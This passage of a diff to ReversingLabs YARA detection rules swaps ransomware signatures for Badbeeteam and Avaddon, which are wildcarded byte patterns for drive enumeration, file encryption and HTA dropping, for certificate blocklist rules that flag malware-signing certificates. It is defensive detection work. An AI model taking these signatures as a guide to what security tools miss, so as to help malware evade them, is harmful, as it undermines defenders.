-            ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B CE 89 7D ?? F7 E9 83 C4 ?? 89 5D ?? C1 FA ?? 8D 4D
-        }
-		$enum_drives_p2 = {
-            8B C2 C1 E8 ?? 03 C2 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? FF 75
-            ?? 50 51 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B
-            4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
-            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 47 83 FF ?? 0F 8C ??
-            ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 89 5D ?? C6 45 ?? ?? 8B 4D ?? 8B 31
-            3B F1 0F 84 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? 8B C8 C6 45
-            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F8 C6 45 ?? ?? 8B 4E ?? 89 4F ?? 8B 4E ?? 89 4F ?? 8D
-            4F ?? 8B 46 ?? 89 47 ?? 8D 46 ?? 3B C8 74 ?? 83 78 ?? ?? 8B D0 72 ?? 8B 10 FF 70 ??
-            52 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HANNAH SISK LIMITED" and pe.signatures [ i ] . serial == "06:3d:cd:7d:7b:0b:c7:7c:ac:84:4c:72:13:be:39:89" and 1656892801 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_6F8777Aa866142Ad7120E5E1C9321E37 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "ace8a8b4-5288-56c4-bd47-9eb42ea41ecb"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12554-L12570"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ca3ff0c7192ba90932d35d053712816555dea051ce15d29a7ccf4e37da989899"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $enum_drives_p* ) ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CLOUD SOFTWARE LINE CO., LTD." and pe.signatures [ i ] . serial == "6f:87:77:aa:86:61:42:ad:71:20:e5:e1:c9:32:1e:37" and 1629676800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Badbeeteam : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4A7F07C5D4Ad2E23F9E8E03F0E229Dd4 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Badbeeteam ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "39490b21-34b9-51cb-a3ed-672b3186a233"
-		date = "2020-11-13"
-		modified = "2020-11-13"
+		id = "76be58d9-d1a3-5dec-807e-941714be80f9"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Badbeeteam.yara#L1-L137"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9b5367655c7c70958332d31524833d96d03027aab693393b19f478a80482abd0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12572-L12588"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6dc2bfac77117e294cacc772f7bfaea8b2e3caa26a0afd3729d517e91ca20ea5"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Badbeeteam"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
-            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F C9 C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
-            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
-            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ??
-            8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ??
-            8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF 57 57
-            57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74
-            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ??
-            ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8
-            ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ??
-            3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D
-        }
-		$find_files_p2 = {
-            56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ??
-            ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ??
-            ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D
-            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
-            88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ??
-            75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ??
-            ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2
-            C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
-            ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files_p1 = {
-            59 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 F1 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ??
-            51 E8 ?? ?? ?? ?? 59 B9 ?? ?? ?? ?? 89 D6 6A ?? 5A 56 50 E8 ?? ?? ?? ?? 8D 8C 24 ??
-            ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? FF 04 24 51 57 E8 ?? ?? ?? ?? 58 59 8D 8C
-            24 ?? ?? ?? ?? 8D 54 24 ?? 57 E8 ?? ?? ?? ?? 58 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ??
-            ?? ?? 8B 84 24 ?? ?? ?? ?? F2 0F 10 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? A1 ?? ??
-            ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? 8B 00 83 F8 ?? 72 ?? 8D 84 24 ?? ?? ?? ?? C7 84 24
-            ?? ?? ?? ?? ?? ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 31 C0 C7 44 24 ?? ?? ?? ?? ?? 40 89
-            84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 57 E8
-            ?? ?? ?? ?? 59 89 D6 B9 ?? ?? ?? ?? 6A ?? 5A 56 50 E8 ?? ?? ?? ?? 59 5A 89 F9 89 C3
-            E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? 6A ?? 59 8D 7C 24 ?? 8D B4 24 ?? ?? ?? ?? F3
-            A5 6A ?? 59 8D BC 24 ?? ?? ?? ?? 8D 74 24 ?? 31 C0 F3 A5 E9 ?? ?? ?? ?? 8B 84 24 ??
-            ?? ?? ?? 85 C0 74 ?? 8B 8C 24 ?? ?? ?? ?? 50 FF 11 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 8B
-            70 ?? 8B 78 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 89 C1 89 F2 57 E8 ?? ?? ?? ??
-            58 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 69
-        }
-		$encrypt_files_p2 = {
-            7B ?? ?? ?? ?? ?? 89 C6 83 C6 ?? 85 FF 74 ?? 83 7E ?? ?? 74 ?? 8D 46 ?? 50 E8 ?? ??
-            ?? ?? 58 81 C6 ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 74 ?? 83 3E ?? 74 ??
-            8D 4E ?? E8 ?? ?? ?? ?? EB ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 58 8B 06 F0 FF 08 75 ?? 56
-            E8 ?? ?? ?? ?? EB ?? 53 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 58 59 8B 4C 24 ?? 85 C9 74 ??
-            8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59
-            6B 5B ?? ?? 89 C7 89 C6 83 C7 ?? 85 DB 74 ?? 8D 4E ?? E8 ?? ?? ?? ?? 83 7E ?? ?? 74
-            ?? 57 E8 ?? ?? ?? ?? 58 83 3F ?? 74 ?? 8D 47 ?? EB ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 58
-            83 C6 ?? 83 C7 ?? 83 C3 ?? EB ?? 8D 84 24 ?? ?? ?? ?? 50 8D 5C 24 ?? 53 E8 ?? ?? ??
-            ?? 58 59 8B 4C 24 ?? 85 C9 74 ?? 8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 8D B4 24
-            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 6B 7E ?? ?? 89 C1 85 FF 74 ?? 8D 59 ?? 83 C1 ?? E8
-            ?? ?? ?? ?? 89 D9 83 C7 ?? 8D 5C 24 ?? EB ?? 56 53 E8 ?? ?? ?? ?? 58 59 8B 4C 24 ??
-            85 C9 74 ?? 8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 A1 ?? ?? ?? ?? 8B 00 83 F8 ??
-            72 ?? 89 E0 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 89 C6 89 D7 68 ?? ?? ?? ?? 8D 44
-            24 ?? 50 E8 ?? ?? ?? ?? 59 59 89 B4 24 ?? ?? ?? ?? 89 BC 24 ?? ?? ?? ?? 89 84 24 ??
-            ?? ?? ?? 89 94 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 6A ?? 58 89 44 24 ?? 83 64 24
-            ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 53 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 77 ?? 83 C7 ?? 8D 4E ?? E8 ??
-            ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 66 ?? ?? 89 F9 E8 ?? ?? ?? ?? 8D 65 ?? 5E 5F 5B 5D
-            C3
-        }
-		$drop_hta_file_p1 = {
-            6A ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 59 89 D3 89 F9 89
-            C2 53 E8 ?? ?? ?? ?? 58 8D B4 24 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 58 31 DB 43 53 57 E8 ?? ?? ?? ?? 59
-            5A 53 89 DF 50 E8 ?? ?? ?? ?? 59 5A 8D 5C 24 ?? 89 C2 89 D9 56 E8 ?? ?? ?? ?? 58 39
-            3B 0F 85 ?? ?? ?? ?? F2 0F 10 44 24 ?? A1 ?? ?? ?? ?? 8D 74 24 ?? 8D BC 24 ?? ?? ??
-            ?? F2 0F 11 44 24 ?? 8B 00 83 F8 ?? 72 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 59 89
-            84 24 ?? ?? ?? ?? 31 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 40 89
-            84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 BC 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ??
-            ?? EB ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
-            8D BC 24 ?? ?? ?? ?? 57 8D B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 F1 E8 ??
-            ?? ?? ?? 57 E8 ?? ?? ?? ?? 58 6A ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A
-        }
-		$drop_hta_file_p2 = {
-            68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 58
-            31 DB 43 53 56 E8 ?? ?? ?? ?? 59 5A 53 50 E8 ?? ?? ?? ?? 59 5A 8D 74 24 ?? 89 C2 89
-            F1 57 E8 ?? ?? ?? ?? 58 39 1E 0F 85 ?? ?? ?? ?? F2 0F 10 44 24 ?? A1 ?? ?? ?? ?? 8D
-            74 24 ?? F2 0F 11 84 24 ?? ?? ?? ?? 8B 00 83 F8 ?? 72 ?? 68 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 89 44 24 ?? 31 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            89 54 24 ?? 40 89 84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? 89
-            84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? 8B 44 24 ?? 89 44 24 ?? 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 74 24 ?? 56 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ??
-            83 C4 ?? 89 D9 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 58 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59
-            8D BC 24 ?? ?? ?? ?? 89 C3 89 84 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 F9 6A ?? E8 ?? ??
-            ?? ?? 58 83 64 24 ?? ?? 83 64 24 ?? ?? 57 E8 ?? ?? ?? ?? 59 8D 4C 24 ?? 51 56 6A ??
-            68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 53 E8
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Danalis LLC" and pe.signatures [ i ] . serial == "4a:7f:07:c5:d4:ad:2e:23:f9:e8:e0:3f:0e:22:9d:d4" and 1608681600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_F5F9C8F8C33E4Ce84Dd48Fcb03Ccb075 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "74203aa1-e5d0-59d9-b9f8-b79f5fbe271e"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12590-L12608"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ac3bab3f5a93099f39b0862b419346d1eb3d0f75d86e121ba30626d496c46c57"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $drop_hta_file_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Abdulkadir \\xC5\\x9Eahin" and ( pe.signatures [ i ] . serial == "00:f5:f9:c8:f8:c3:3e:4c:e8:4d:d4:8f:cb:03:cc:b0:75" or pe.signatures [ i ] . serial == "f5:f9:c8:f8:c3:3e:4c:e8:4d:d4:8f:cb:03:cc:b0:75" ) and 1545004800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Avaddon : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_57Fc55239F21F139978609E323097132 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Avaddon ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f3a57482-5799-594b-bcfa-1137ca04dfd5"
-		date = "2020-10-19"
-		modified = "2020-10-19"
+		id = "e71d575c-5a30-5158-80ee-3508cdaf5636"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Avaddon.yara#L1-L148"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1b2c449d5bad02dd06cb4a980fcca1feaf02b1d8127096bb39deecbc544272a6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12610-L12626"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "030bb847e524e672ee382e0284ba3f027920f60c70bbd153d4b9cdd2669e6a99"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Avaddon"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
-            7D ?? 2B CA D1 F9 8B C7 41 F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F 5B C9 C3 56 8D 5F
-            ?? 03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 75 ?? 8B 7D ?? 8B CF E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 56 E8 ?? ?? ?? ??
-            59 EB ?? 8B 47 ?? 89 30 83 47 ?? ?? 33 DB 6A ?? E8 ?? ?? ?? ?? 59 8B C3 5E EB ?? 33
-            C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 89 8D ?? ?? ?? ?? 56 57 3B D3 74 ?? 0F
-            B7 02 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 84 C0 75 ?? 83 EA ?? 3B D3 75 ?? 8B 8D ??
-            ?? ?? ?? 0F B7 32 83 FE ?? 75 ?? 8D 43 ?? 3B D0 74 ?? 51 33 FF 57 57 53 E8 ?? ?? ??
-            ?? 83 C4 ?? E9 ?? ?? ?? ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 2B D3 0F B6 C0 D1 FA
-            42 F7 D8 1B C0 33 FF 57 57 23 C2 57 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 53 FF
-            15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B F8 E9 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 6A ?? 89 8D ?? ?? ?? ?? 59 66 39
-            8D ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD
-            ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 8B 85 ?? ?? ??
-            ?? 59 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ??
-            ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B F8 56 FF 15 ?? ?? ??
-            ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 45 ?? 8B
-            7D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? C7 45 ?? ??
-            ?? ?? ?? 51 6A ?? 6A ?? 6A ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84
-        }
-		$encrypt_files_p2 = {
-            6A ?? 8D 45 ?? 0F 57 C0 50 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 6A ?? 51 8D 45 ?? 0F 43 45 ?? 68 ?? ?? ??
-            ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75
-            ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 33 F6 39 75 ?? 0F 86 ?? ?? ?? ?? 83
-            7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 45 ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 4D ?? 03 C6
-            50 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F
-            43 45 ?? 53 51 50 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? 83 7D ?? ?? 8D 4D ?? 6A ?? 51 8D 45 ?? 0F 43 45 ?? 53 50 57 FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 3B 75 ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 74
-        }
-		$encrypt_files_p3 = {
-            8B 45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 51 52 57 89 55 ?? 89 4D ?? FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 8B 9D ?? ?? ?? ?? 83 7B ?? ?? 8D 43 ?? 72 ?? 8B 00 6A ??
-            8D 4D ?? 51 FF 73 ?? 50 57 FF D6 85 C0 74 ?? 8B 4B ?? 39 4D ?? 75 ?? 8B 45 ?? 89 85
-            ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 6A ?? 8D 85 ?? ??
-            ?? ?? 89 4D ?? 50 57 C7 45 ?? ?? ?? ?? ?? FF D6 85 C0 74 ?? 83 7D ?? ?? 75 ?? B3 ??
-            EB ?? 32 DB 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49
-            ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7
